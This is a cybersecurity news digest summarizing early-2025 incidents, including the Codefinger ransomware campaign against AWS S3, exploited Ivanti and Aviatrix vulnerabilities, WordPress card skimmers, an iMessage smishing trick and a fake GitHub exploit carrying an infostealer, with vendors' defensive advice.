Daily Brief

A new ransomware campaign utilizes AWS's Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt Amazon S3 buckets, demanding ransoms for decryption keys. The operation, named after the threat actor "Codefinger," has already affected at least two entities, with potential for wider adoption among cybercriminals. Amazon S3, used for storing various data types, combined with SSE-C allows users to apply their own AES-256 encryption keys which AWS does not retain. Hackers accessed AWS credentials, employed user encryption keys to lock data, and set a policy to delete files in seven days unless a ransom is paid. Ransom notes placed in affected directories instruct victims to pay via Bitcoin to regain access to the custom encryption key. Halcyon, which discovered the campaign, has alerted Amazon; Amazon urges customers to enforce strict security measures and key management practices. Recommended defenses include disabling SSE-C on S3 buckets, rotating active AWS keys frequently, and minimizing account permissions.

Ransomware gang 'Codefinger' targets AWS S3 buckets, encrypting data using AWS's native server-side encryption with customer-provided keys. The attackers demand ransom for the AES-256 decryption keys, threatening irreversible data deletion within seven days. Codefinger accesses Amazon cloud storage using exposed or stolen AWS keys, enabling them to manipulate data with read and write permissions. This method represents a significant risk as it uses legitimate AWS encryption features, complicating detection and mitigation. Victims are left with a ransom note including bitcoin payment details and are warned against altering account settings or data. AWS advises restricting the use of customer-provided keys in S3 buckets and stresses regular security audits and key rotations. AWS commented on maintaining robust security practices and highlighted features that allow secure API requests and minimize credential exposure. The use of AWS's legitimate infrastructure for ransom activities presents new challenges in securing hosted data and preventing unauthorized access.

A critical vulnerability, CVE-2024-50603, in Aviatrix Controller is being exploited, enabling attackers to deploy backdoors and cryptocurrency miners. The flaw allows for unauthenticated remote code execution due to insufficient input sanitization in some API endpoints. Security updates to patch the vulnerability are available in Aviatrix software versions 7.1.4191 and 7.2.4996. Real-world attacks have used this entry point to install the XMRig mining tool and the Sliver C2 framework for likely ongoing exploitation. About 3% of cloud enterprise environments use Aviatrix Controller, with 65% having potential privilege escalation paths. Wiz researchers recommend immediate application of the patches and restricting public access to the Aviatrix Controller to mitigate risks.

A critical vulnerability in Ivanti Connect Secure appliances has been actively exploited as a zero-day since mid-December 2024. Identified as CVE-2025-0282 with a CVSS score of 9.0, the flaw is a stack-based buffer overflow that enables unauthenticated remote code execution. Google-owned Mandiant has reported the deployment of multiple malware, including SPAWN ecosystem variants and two new malware families, DRYHOOK and PHASEJAM. Multiple threat actor groups are believed to be involved in exploiting this vulnerability, including the China-linked group UNC5337. The exploit and subsequent attacks underscore the increasing complexity and coordination among cybercriminal attackers. It is imperative for organizations using Ivanti Connect Secure appliances to deploy patches or mitigation measures immediately to prevent potential breaches. Staying informed about emerging vulnerabilities and updating systems promptly are crucial for maintaining cybersecurity posture.

In 2024, ransomware attacks against VMware ESXi servers surged, with the average ransom soaring to $5 million. Approximately 8,000 ESXi hosts are exposed directly to the internet, posing significant security risks. The prevalent ransomware variants targeting these servers are based on the Babuk ransomware, engineered to dodge security detection. Cybercriminals are monetizing their access by selling initial entry points to other malicious entities, intensifying the threat landscape. Key vulnerabilities lie in the architecture of ESXi and the central management system, vCenter, which when compromised, grants attackers extensive control over networked hosts. Attackers employ a hybrid encryption strategy during their campaigns to complicate data recovery, pressuring victims into paying ransoms. Organizations are advised to enhance ESXi server security through regular vulnerability testing and collaborative strategies like Continuous Threat Exposure Management (CTEM).

Nominet, a UK domain registrar, is currently investigating unauthorized access to its network, exploiting a zero-day vulnerability in Ivanti's VPN software. Despite the intrusion, no evidence of data theft, leaks, or backdoors has been reported; domain systems remain fully operational. Nominet has engaged external cybersecurity experts to assist with their ongoing investigation and has implemented heightened security measures, including restricted VPN access. The zero-day vulnerability, identified as CVE-2025-0282, has been actively exploited since December and affects various Ivanti products, with patches now being rolled out. This incident is part of a series of attacks by the threat actor group UNC5337, linked to another group with a potential connection to China, known as UNC5221. Mandiant, assisting Ivanti in the vulnerability analysis, has observed the deployment of both known and new malware types, indicating a significant cybersecurity threat. Nominet has advised all users of Ivanti's affected software to apply the available patches immediately to mitigate potential risks.

Cybersecurity researchers have uncovered a new credit card skimmer malware campaign that targets WordPress e-commerce sites. The malicious JavaScript is injected into the WordPress database table, evading traditional detection methods. This malware activates on checkout pages, where it can hijack payment fields or inject fake credit card forms. The skimmer captures credit card numbers, expiration dates, CVV numbers, and billing information, encoding this data with Base64 and AES-CBC to avoid detection. Stolen data is sent to attacker-controlled servers, with domains identified in the report. This skimming technique closely follows another campaign that used JavaScript to create fake payment forms and capture data on checkout pages. Additional user data is harvested through Magento APIs, including names, addresses, and phone numbers. The report mentions a separate phishing campaign using PayPal to target victims, highlighting an ongoing trend in financially motivated cyber threats.

Cybersecurity company watchTowr Labs successfully took control of over 4,000 web backdoors by registering expired domain names used by threat actors for as low as $20 per domain. The operation involved over 40 domain names previously used for command-and-control (C2) operations, which were then sinkholed in collaboration with the Shadowserver Foundation. The compromised systems displayed beaconing activities indicating breaches in government and academic sectors in countries including Bangladesh, China, Nigeria, South Korea, and Thailand. The backdoors, primarily web shells like c99shell and r57shell, enabled extensive control over compromised systems, allowing file operations, code execution, and additional malicious payload deployments. Some of the web shells were discovered to have secondary backdoors installed by original script maintainers, unintentionally exposing the compromised systems to further exploits. Prior research by watchTowr Labs revealed similar issues with legacy WHOIS server domains, where registration of a single expired domain revealed over 135,000 systems still attempting communications. The domains handled traffic from a wide array of government, military, and educational networks worldwide, underscoring common vulnerabilities like expired domains and poorly managed web shells among both attackers and defenders.

A reported hack on Gravy Analytics potentially exposed millions by facilitating unauthorized user data sales, including sensitive location information. The European General Court fined the European Commission €400 for breaching GDPR by unlawly transferring user data to the U.S. via Facebook credentials. Critical security update issued for Cisco's Identity Services Engine due to upcoming stringent certificate mappings by Microsoft set for 2025. A new ransomware group, FunkSec, suspected of exaggerating claims about victim numbers and possibly using AI to create malware. A breach targeting cannabis retailer Stiiizy's customers involved theft of personal data through compromised point-of-sale system by cybercriminals. CrowdStrike identified phishing attempts where attackers impersonate their recruiters, sending out false job offers to spread malware. Personal data from a variety of apps, including Tinder, Grindr, and Microsoft Office365, implicated in breaches due to ad-driven data collection schemes.

Cybercriminals are using smishing tactics to bypass Apple iMessage's phishing protection by encouraging users to reactivate disabled links in phishing texts. iMessage automatically disables links from unknown senders to prevent phishing, but replying to these messages or adding the sender to contacts re-enables the links. Recent smishing campaigns have involved messages pretending to be from USPS or regarding unpaid road tolls, asking recipients to reply with "Y" to activate the links. This tactic has become more prevalent over the past year, showing a significant increase since the summer. The familiarity of replying "Y" or "STOP" in text messages is exploited by attackers to trick users into engaging and thus confirming their responsiveness to phishing attempts. While savvy users often recognize these phishing attempts, more vulnerable individuals, like the elderly, may not, leading to potential personal and financial information theft. Users are advised to contact organizations directly via official channels to verify suspicious messages instead of interacting with the potentially dangerous links.

The IRS has reintroduced its Identity Protection Personal Identification Number (IP PIN) program to enhance security and combat fraudulent tax returns. Taxpayers are urged to obtain an IP PIN, providing a unique six-digit number each year, to secure their tax filings against identity theft. Despite a temporary shutdown in December for maintenance, the program restarted this week, encouraging immediate enrollment due to heightened risks. Following the National Public Data breach exposing over 100 million Social Security Numbers, the implementation of an IP PIN has become critical. The IRS flagged 2.8 million suspicious tax returns last year through its Taxpayer Protection Program, underlining the importance of preventive measures like the IP PIN. Taxpayers can apply for the IP PIN by registering online via the IRS website or, if eligible, requesting through Form 15227 or at a Taxpayer Assistance Center. Continuous enrollment in the IP PIN program is recommended to ensure annual receipt of a new PIN, enhancing long-term security against tax-related fraud. The IRS advises early enrollment within a calendar year to preemptively counteract fraudulent filings made using stolen taxpayer identities.

A fake PoC exploit for CVE-2024-49113, named "LDAPNightmare," was found on GitHub deploying infostealer malware. The malware exfiltrates sensitive data from affected users to an external FTP server, following a misleading presentation as a legitimate exploit. Disguised as a fork from a legitimate SafeBreach Labs PoC, the malicious repository targets GitHub users searching for vulnerability tests. Once executed, the 'poc.exe' file deploys further malicious scripts that collect extensive system and network data, then send it to attackers. Past incidents have seen similar tactics employing GitHub to host and distribute malware under the guise of legitimate exploits. To mitigate risks, users are advised to verify the authenticity of repositories, scrutinize code before execution, and utilize services like VirusTotal for checking binaries. Trend Micro highlights the continuous risk and prevalence of such tactics in the cybersecurity landscape, urging enhanced vigilance among GitHub users.

Microsoft is suing a foreign hacker group for exploiting its Azure AI services to create harmful content. The hackers developed software to bypass Microsoft's AI safety protocols and monetized the access by selling it. The attack involved scraping exposed customer credentials and unlawfully altering AI capabilities for offensive outputs. Microsoft has revoked access, seized a related criminal website and fortified safety measures against such future exploits. Legal documents uncover that defendants used stolen Azure API keys and provided detailed utilization instructions for generating malicious content. The hacking group conducted a systematic theft of API keys from several U.S. companies and developed tools like "de3u" to abuse Microsoft's AI tools. The company has taken steps to hinder the group's operations, including deleting parts of their proxy infrastructure and related online content previously used for malicious intent.

The U.S. Department of Justice has indicted three Russian nationals for running cryptocurrency mixing services Blender.io and Sinbad.io, used to launder cybercrime proceeds. Roman Vitalyevich Ostapenko and Alexander Evgenievich Oleynik were arrested on December 1, 2024; a third individual, Anton Vyachlavovich Tarasov, remains at large. These services reportedly helped obscure the origins of cryptocurrencies linked to various cybercrimes, including ransomware and wire fraud. Blender.io was previously sanctioned for laundering money for the North Korea-linked Lazarus Group and is suspected to have rebranded as Sinbad.io after ceasing operations. International law enforcement recently seized the online infrastructure of Sinbad.io, identifying it as a continued facilitator of global cybercrime activities. If convicted, the defendants face up to 25 years in prison for conspiracy to commit money laundering and operating an unlicensed money-transmitting business. The arrests are part of broader efforts to address cryptocurrency scams which have totaled over $25 million in losses for over 1,100 victims, according to blockchain intelligence firm Chainalysis.

Chinese cyber-spies infiltrated the U.S. Treasury Department to obtain documents related to real-estate transactions near American military bases. The espionage targeted officials from the Committee on Foreign Investment in the U.S. (CFIUS), which assesses foreign investments for national security risks. Recent expansion of the committee's authority allows for additional scrutiny of property purchases or leases near U.S. military sites due to concerns over potential Chinese spying. While the stolen documents were not classified, they could still provide strategic insights beneficial to Chinese intelligence. The breach involved compromising a third-party service provider, leading to unauthorized access to several Treasury user workstations. The U.S. Treasury has increased its cyber defense capabilities significantly over the past four years in response to ongoing threats. China denies the allegations of espionage and data theft as tensions between Washington and Beijing continue to escalate. The U.S. Congress has been notified about the incident amid broader concerns about Chinese cyber activities targeting American infrastructure and telecommunications.